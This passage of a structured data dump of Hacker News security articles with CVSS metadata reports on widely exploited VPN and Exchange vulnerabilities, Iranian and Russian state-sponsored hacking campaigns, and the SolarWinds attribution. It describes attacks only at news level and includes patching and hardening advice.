[CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T03:29:54", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjhNJNYKsz0zRz-CzaUqAm2MRgt6hyl7sq05Q-XnbDm2VwMedx339MqSyZOAKaZNIywGOU7b4usV_c7PkobISvqG4n1OWRAK6MowARD4h2L_HH0soDHDxo-HLg5bT1n0PRyLyda5DamIal3W2BOTcPpLYlDUc8cUHZ5tqR_YBCcyTEpn2SBhSPC2m-r/s728-e100/flaws.gif>)\n\n[Log4Shell](<https://thehackernews.com/2021/12/new-apache-log4j-update-released-to.html>), [ProxyShell](<https://thehackernews.com/2021/11/hackers-exploiting-proxylogon-and.html>), [ProxyLogon](<https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html>), [ZeroLogon](<https://thehackernews.com/2020/09/detecting-and-preventing-critical.html>), and flaws in [Zoho ManageEngine AD SelfService Plus](<https://thehackernews.com/2021/09/cisa-warns-of-actively-exploited-zoho.html>), [Atlassian Confluence](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), and [VMware vSphere Client](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>) emerged as some of the top exploited security vulnerabilities in 2021.\n\nThat's according to a \"[Top Routinely Exploited Vulnerabilities](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>)\" report released by cybersecurity authorities from the Five Eyes nations Australia, Canada, New Zealand, the U.K., and the U.S.\n\nOther frequently weaponized flaws included a remote code execution bug in Microsoft Exchange Server ([CVE-2020-0688](<https://thehackernews.com/2021/07/top-30-critical-security.html>)), an arbitrary file read vulnerability in Pulse Secure Pulse Connect Secure ([CVE-2019-11510](<https://thehackernews.com/2020/04/pulse-secure-vpn-vulnerability.html>)), and a path traversal defect in Fortinet FortiOS and FortiProxy ([CVE-2018-13379](<https://thehackernews.com/2021/09/hackers-leak-vpn-account-passwords-from.html>)).\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjV_5FJTAhnIsR8JgqL9uQg0ZFxcNG_CjB_UQkbmLMHp3ywOvVYK21BPlGIrlFOkrpjXKZTudyfgIFVbvdoCqezanw_M902zAF_j0D0iiMlBFYA9xgTU3PqsuazBsluMEFz04W5fr6wR3IcoNmrMSzQaRgR5ai54nGTQjKTBNImgKDAlUP3blp4-t8a/s728-e100/cisa.jpg>)\n\nNine of the top 15 routinely exploited flaws were remote code execution vulnerabilities, followed by two privilege escalation weaknesses, and one each of security feature bypass, arbitrary code execution, arbitrary file read, and path traversal flaws.\n\n\"Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities,\" the agencies said in a joint advisory.\n\n\"For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (PoC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors.\"\n\nTo mitigate the risk of exploitation of publicly known software vulnerabilities, the agencies are recommending organizations to apply patches in a timely fashion and implement a centralized patch management system.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-28T05:41:00", "type": "thn", "title": "U.S. Cybersecurity Agency Lists 2021's Top 15 Most Exploited Software Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688"], "modified": "2022-05-09T02:55:12", "id": "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "href": "https://thehackernews.com/2022/04/us-cybersecurity-agency-lists-2021s-top.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:37", "description": "[](<https://thehackernews.com/images/-ZHqaACEm1IE/Xkv7mFYNdVI/AAAAAAAAABQ/u9DIxl0wBik0Tdeo0zYMA5h4Eycz0ntogCLcBGAsYHQ/s728-e100/iranian-apt-hacking-group.jpg>)\n\nA new report published by cybersecurity researchers has unveiled evidence of Iranian state-sponsored hackers targeting dozens of companies and organizations in Israel and around the world over the past three years. \n \nDubbed \"**Fox Kitten**,\" the cyber-espionage campaign is said to have been directed at companies from the IT, telecommunication, oil and gas, aviation, government, and security sectors. \n \n\"We estimate the campaign revealed in this report to be among Iran's most continuous and comprehensive campaigns revealed until now,\" ClearSky [researchers said](<https://www.clearskysec.com/fox-kitten/>). \n \n\"The revealed campaign was used as a reconnaissance infrastructure; however, it can also be used as a platform for spreading and activating destructive malware such as ZeroCleare and Dustman.\" \n \nTying the activities to threat groups APT33, APT34, and APT39, the offensive \u2014 conducted using a mix of open source and self-developed tools \u2014 also facilitated the groups to steal sensitive information and employ supply-chain attacks to target additional organizations, the researchers said. \n \n\n\n## Exploiting VPN Flaws to Compromise Enterprise Networks\n\n \nThe primary attack vector employed by the Iranian groups has been the exploitation of unpatched VPN vulnerabilities to penetrate and steal information from target companies. The prominent VPN systems exploited this way included Pulse Secure Connect ([CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>)), Palo Alto Networks' Global Protect ([CVE-2019-1579](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1579>)), Fortinet FortiOS ([CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)), and Citrix ([CVE-2019-19781](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>)). \n \nClearSky noted that the hacking groups were able to successfully acquire access to the targets' core systems, drop additional malware, and laterally spread across the network by exploiting \"1-day vulnerabilities in relatively short periods of time.\" \n \n\n\n[](<https://thehackernews.com/images/-HB88FpLNx7E/Xkv6_Gs13XI/AAAAAAAAABE/sTXpiQuKh4w_qMLsMyuIs2xY7eNJONDHQCLcBGAsYHQ/s728-e100/Iranian-hackers-1.jpg>)\n\n \nUpon successfully gaining an initial foothold, the compromised systems were found to communicate with attacker-control command-and-control (C2) servers to download a series of custom VBScript files that can, in turn, be used to plant backdoors. \n \nFurthermore, the backdoor code in itself is downloaded in chunks so as to avoid detection by antivirus software installed on the infected computers. It's the job of a separate downloaded file \u2014 named \"combine.bat\" \u2014 to stitch together these individual files and create an executable. \n \nTo perform these tasks and achieve persistence, the threat actors exploited tools such as [Juicy Potato](<https://github.com/ohpe/juicy-potato>) and [Invoke the Hash](<https://github.com/Kevin-Robertson/Invoke-TheHash>) to gain high-level privileges and laterally move across the network. Some of the other tools developed by the attackers include: \n \n\n\n * STSRCheck - A tool for mapping databases, servers, and open ports in the targeted network and brute-force them by logging with default credentials.\n * Port.exe - A tool to scan predefined ports and servers.\n \nOnce the attackers gained lateral movement capabilities, the attackers move to the final stage: execute the backdoor to scan the compromised system for relevant information and exfiltrate the files back to the attacker by establishing a remote desktop connection (using a self-developed tool called POWSSHNET) or opening a socket-based connection to a hardcoded IP address. \n \n\n\n[](<https://thehackernews.com/images/-I5Tu4KNsPis/Xkv6nXcj6DI/AAAAAAAAAA8/E1cMYGuEIdsjFmfX7dXhnzRwfrgC0_dRACLcBGAsYHQ/s728-e100/Iranian-hackers.jpg>)\n\n \nIn addition, the attackers used [web shells](<https://www.us-cert.gov/ncas/alerts/TA15-314A>) in order to communicate with the servers located inside the target and upload files directly to a C2 server. \n \n\n\n## The Work of Multiple Iranian Hacking Groups\n\n \nBased on the campaign's use of web shells and overlaps with the attack infrastructure, the ClearSky report highlighted that the attacks against VPN servers are possibly linked to three Iranian groups \u2014 APT33 (\"Elfin\"), APT34 (\"OilRig\") and APT39 (Chafer). \n \nWhat's more, the researchers assessed that the campaign is a result of a \"cooperation between the groups in infrastructure,\" citing similarities in the tools and work methods across the three groups. \n \nJust last month, Iranian state-backed hackers \u2014 dubbed \"[Magnallium](<https://www.wired.com/story/iran-apt33-us-electric-grid>)\" \u2014 were discovered carrying out password-spraying attacks targeting US electric utilities as well as oil and gas firms. \n \nGiven that the attackers are weaponizing VPN flaws within 24 hours, it's imperative that organizations install security patches as and when they are available. \n \nAside from following the principle of least privilege, it also goes without saying that critical systems are monitored continuously and kept up to date. Implementing two-step authentication can go a long way towards minimizing unauthorized logins.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-02-18T15:06:00", "type": "thn", "title": "Iranian Hackers Exploiting VPN Flaws to Backdoor Organizations Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-1579", "CVE-2019-19781"], "modified": "2020-02-18T15:13:08", "id": "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "href": "https://thehackernews.com/2020/02/iranian-hackers-vpn-vulnerabilities.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:44", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEivOb0--JbZm0DKk17OtegvDf0JMgVq1rnkokni7RLCsqEBf17tLvxhVDjVCC8yZeN6jpVJCkJlb3GTbW4f29ZlHKK9dZKnxCnVgFaE0N7nhOJe9r3HRvLR-reRBzNHAdx6aUoQDU5yI90E1LqRdEM3guLQQv95JsKCUSy1ZAoTckx4Q4_Vb6CxtXGe>)\n\nAmid renewed tensions between the U.S. and Russia over [Ukraine](<https://apnews.com/article/joe-biden-europe-russia-ukraine-geneva-090d1bd24f7ced8ab84907a9ed031878>) and [Kazakhstan](<https://thehill.com/policy/international/588860-tensions-between-us-russia-rise-over-military-involvement-in-kazakhstan>), American cybersecurity and intelligence agencies on Tuesday released a joint advisory on how to detect, respond to, and mitigate cyberattacks orchestrated by Russian state-sponsored actors.\n\nTo that end, the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and National Security Agency (NSA) have laid bare the tactics, techniques, and procedures (TTPs) adopted by the adversaries, including spear-phishing, brute-force, and [exploiting known vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) to gain initial access to target networks.\n\nThe list of flaws exploited by Russian hacking groups to gain an initial foothold, which the agencies said are \"common but effective,\" are below \u2014\n\n * [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (FortiGate VPNs)\n * [CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) (Cisco router)\n * [CVE-2019-2725](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (Oracle WebLogic Server)\n * [CVE-2019-7609](<https://nvd.nist.gov/vuln/detail/CVE-2019-7609>) (Kibana)\n * [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>) (Zimbra software)\n * [CVE-2019-10149](<https://nvd.nist.gov/vuln/detail/CVE-2019-10149>) (Exim Simple Mail Transfer Protocol)\n * [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (Pulse Secure)\n * [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (Citrix)\n * [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (Microsoft Exchange)\n * [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>) (VMWare)\n * [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (F5 Big-IP)\n * [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) (Oracle WebLogic)\n * [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>) (Microsoft Exchange, exploited frequently alongside [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>))\n\n\"Russian state-sponsored APT actors have also demonstrated sophisticated tradecraft and cyber capabilities by compromising third-party infrastructure, compromising third-party software, or developing and deploying custom malware,\" the agencies [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/01/11/cisa-fbi-and-nsa-release-cybersecurity-advisory-russian-cyber>).\n\n\"The actors have also demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments \u2014 including cloud environments \u2014 by using legitimate credentials.\"\n\nRussian APT groups have been historically observed setting their sights on operational technology (OT) and industrial control systems (ICS) with the goal of deploying destructive malware, chief among them being the intrusion campaigns against Ukraine and the U.S. energy sector as well as attacks exploiting trojanized [SolarWinds Orion updates](<https://thehackernews.com/2021/12/solarwinds-hackers-targeting-government.html>) to breach the networks of U.S. government agencies.\n\nTo increase cyber resilience against this threat, the agencies recommend mandating multi-factor authentication for all users, looking out for signs of abnormal activity implying lateral movement, enforcing network segmentation, and keeping operating systems, applications, and firmware up to date.\n\n\"Consider using a centralized patch management system,\" the advisory reads. \"For OT networks, use a risk-based assessment strategy to determine the OT network assets and zones that should participate in the patch management program.\"\n\nOther recommended best practices are as follows \u2014\n\n * Implement robust log collection and retention\n * Require accounts to have strong passwords\n * Enable strong spam filters to prevent phishing emails from reaching end-users\n * Implement rigorous configuration management programs\n * Disable all unnecessary ports and protocols\n * Ensure OT hardware is in read-only mode\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T09:14:00", "type": "thn", "title": "FBI, NSA and CISA Warns of Russian Hackers Targeting Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-01-12T10:47:49", "id": "THN:3E9680853FA3A677106A8ED8B7AACBE6", "href": "https://thehackernews.com/2022/01/fbi-nsa-and-cisa-warns-of-russian.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[](<https://thehackernews.com/images/-aP3rCXOUpiQ/YIfVcfAWodI/AAAAAAAACX8/f_RfGI2QOewvk7Zu4AaGOKQyirlBpfKfACLcBGAsYHQ/s0/russian-hackers.jpg>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA), Department of Homeland Security (DHS), and the Federal Bureau of Investigation (FBI) on Monday published a new joint advisory as part of their latest attempts to expose the tactics, techniques, and procedures (TTPs) adopted by the Russian Foreign Intelligence Service (SVR) in its attacks targeting the U.S and foreign entities.\n\nBy employing \"stealthy intrusion tradecraft within compromised networks,\" the intelligence agencies [said](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/26/fbi-dhs-cisa-joint-advisory-russian-foreign-intelligence-service>), \"the SVR activity\u2014which includes the recent [SolarWinds Orion supply chain compromise](<https://thehackernews.com/2021/04/researchers-find-additional.html>)\u2014primarily targets government networks, think tank and policy analysis organizations, and information technology companies and seeks to gather intelligence information.\"\n\nThe cyber actor is also being tracked under different monikers, including Advanced Persistent Threat 29 (APT29), the Dukes, CozyBear, and Yttrium. The development comes as the U.S. sanctioned Russia and [formally pinned](<https://thehackernews.com/2021/04/us-sanctions-russia-and-expels-10.html>) the SolarWinds hack and related cyberespionage campaign to government operatives working for SVR.\n\n[APT29](<https://malpedia.caad.fkie.fraunhofer.de/actor/apt_29>), since emerging on the threat landscape in 2013, has been tied to a number of attacks orchestrated with an aim to gain access to victim networks, move within victim environments undetected, and extract sensitive information. But in a noticeable shift in tactics in 2018, the actor moved from deploying malware on target networks to striking cloud-based email services, a fact borne by the SolarWinds attack, wherein the actor leveraged Orion binaries as an intrusion vector to exploit Microsoft Office 365 environments.\n\nThis similarity in post-infection tradecraft with other SVR-sponsored attacks, including in the manner the adversary laterally moved through the networks to obtain access to email accounts, is said to have played a huge role in attributing the SolarWinds campaign to the Russian intelligence service, despite a notable departure in the method used to gain an initial foothold.\n\n\"Targeting cloud resources probably reduces the likelihood of detection by using compromised accounts or system misconfigurations to blend in with normal or unmonitored traffic in an environment not well defended, monitored, or understood by victim organizations,\" the agency noted.\n\nAmong some of the other tactics put to use by APT29 are password spraying (observed during a 2018 compromise of a large unnamed network), exploiting zero-day flaws against virtual private network appliances (such as [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)) to obtain network access, and deploying a Golang malware called [WELLMESS](<https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html>) to plunder [intellectual property](<https://www.pwc.co.uk/issues/cyber-security-services/insights/wellmess-analysis-command-control.html>) from multiple organizations involved in COVID-19 vaccine development.\n\nBesides CVE-2019-19781, the threat actor is known to gain initial footholds into victim devices and networks by leveraging [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2019-9670](<https://nvd.nist.gov/vuln/detail/CVE-2019-9670>), [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), and [CVE-2020-4006](<https://nvd.nist.gov/vuln/detail/CVE-2020-4006>). Also in the mix is the practice of obtaining virtual private servers via false identities and cryptocurrencies, and relying on temporary VoIP telephone numbers and email accounts by making use of an anonymous email service called cock.li.\n\n\"The FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services,\" the advisory read, while also urging businesses to secure their networks from a compromise of trusted software.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-04-27T09:14:00", "type": "thn", "title": "FBI, CISA Uncover Tactics Employed by Russian Intelligence Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-28T06:42:30", "id": "THN:91A2A296EF8B6FD5CD8B904690E810E8", "href": "https://thehackernews.com/2021/04/fbi-cisa-uncover-tactics-employed-by.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:38:20", "description": "[](<https://thehackernews.com/images/-LTN8ZEVASAQ/YHhnaI6y7gI/AAAAAAAACSI/-4R4GM5jnigOmkENHKFJXtyjjp1f6w4QQCLcBGAsYHQ/s0/us-sanctions-russia-solarwinds-hack.jpg>)\n\nThe U.S. and U.K. on Thursday formally attributed the supply chain attack of IT infrastructure management company SolarWinds with \"high confidence\" to government operatives working for Russia's Foreign Intelligence Service (SVR).\n\n\"Russia's pattern of malign behaviour around the world \u2013 whether in cyberspace, in election interference or in the aggressive operations of their intelligence services \u2013 demonstrates that Russia remains the most acute threat to the U.K.'s national and collective security,\" the U.K. government [said](<https://www.gov.uk/government/news/russia-uk-and-us-expose-global-campaigns-of-malign-activity-by-russian-intelligence-services>) in a statement.\n\nTo that effect, the U.S. Department of the Treasury has imposed sweeping sanctions against Russia for \"undermining the conduct of free and fair elections and democratic institutions\" in the U.S. and for its role in facilitating the sprawling SolarWinds hack, while also barring six technology companies in the country that provide support to the cyber program run by Russian Intelligence Services.\n\n[](<https://thehackernews.com/images/-3aKGKEh2OCw/YHhnxG35qkI/AAAAAAAACSQ/DNi8MHTziNkZeNqP2Y6g9DXrwuwcIBooQCLcBGAsYHQ/s0/russian-hacker.jpg>)\n\nThe companies include ERA Technopolis, Pasit, Federal State Autonomous Scientific Establishment Scientific Research Institute Specialized Security Computing Devices and Automation (SVA), Neobit, Advanced System Technology, and Pozitiv Teknolodzhiz (Positive Technologies), the last three of which are IT security firms whose customers are said to include the Russian Ministry of Defense, SVR, and Russia's Federal Security Service (FSB).\n\n\"As a company, we deny the groundless accusations made by the U.S. Department of the Treasury,\" Positive Technologies [said](<https://www.ptsecurity.com/ww-en/about/news/positive-technologies-official-statement-following-u-s-sanctions/>) in a statement. \"In the almost 20 years we have been operating there has been no evidence of the results of Positive Technologies\u2019 research being used in violation of the principles of business transparency and the ethical exchange of information with the professional information security community.\"\n\nIn addition, the Biden administration is also [expelling ten members](<https://home.treasury.gov/policy-issues/financial-sanctions/recent-actions/20210415>) of Russia's diplomatic mission in Washington, D.C., including representatives of its intelligence services.\n\n\"The scope and scale of this compromise combined with Russia's history of carrying out reckless and disruptive cyber operations makes it a national security concern,\" the Treasury Department [said](<https://home.treasury.gov/news/press-releases/jy0127>). \"The SVR has put at risk the global technology supply chain by allowing malware to be installed on the machines of tens of thousands of SolarWinds' customers.\"\n\nFor its part, Moscow had previously [denied involvement](<https://thehackernews.com/2021/01/fbi-cisa-nsa-officially-blames-russia.html>) in the broad-scope SolarWinds campaign, stating \"it does not conduct offensive operations in the cyber domain.\"\n\nThe [intrusions](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) came to light in December 2020 when FireEye and other cybersecurity firms revealed that the operators behind the espionage campaign managed to compromise the software build and code signing infrastructure of SolarWinds Orion platform as early as October 2019 to deliver the Sunburst backdoor with the goal of gathering sensitive information.\n\nUp to 18,000 SolarWinds customers are believed to have received the trojanized Orion update, although the attackers carefully selected their targets, opting to escalate the attacks only in a handful of cases by deploying Teardrop malware based on an initial reconnaissance of the target environment for high-value accounts and assets.\n\n[](<https://thehackernews.com/images/-K6oDMn9wijo/YHhoAIB7XMI/AAAAAAAACSU/SnX4nr33cRUwtWpMv58gmUlwM1J3GLbGwCLcBGAsYHQ/s0/hack.jpg>)\n\nThe adversary's compromise of the SolarWinds software supply chain is said to have given it the ability to remotely spy or potentially disrupt more than 16,000 computer systems worldwide, according to the [executive order](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/>) issued by the U.S. government.\n\nBesides infiltrating the networks of [Microsoft](<https://thehackernews.com/2020/12/microsoft-says-its-systems-were-also.html>), [FireEye](<https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html>), [Malwarebytes](<https://thehackernews.com/2021/01/solarwinds-hackers-also-breached.html>), and [Mimecast](<https://thehackernews.com/2021/03/mimecast-finds-solarwinds-hackers-stole.html>), the attackers are also said to have used SolarWinds as a stepping stone to breaching several U.S. agencies such as the National Aeronautics and Space Administration (NASA), the Federal Aviation Administration (FAA), and the Departments of State, Justice, Commerce, Homeland Security, Energy, Treasury, and the National Institutes of Health.\n\nThe SVR actor is also known by other names such as APT29, Cozy Bear, and The Dukes, with the threat group being tracked under different monikers, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Nobelium 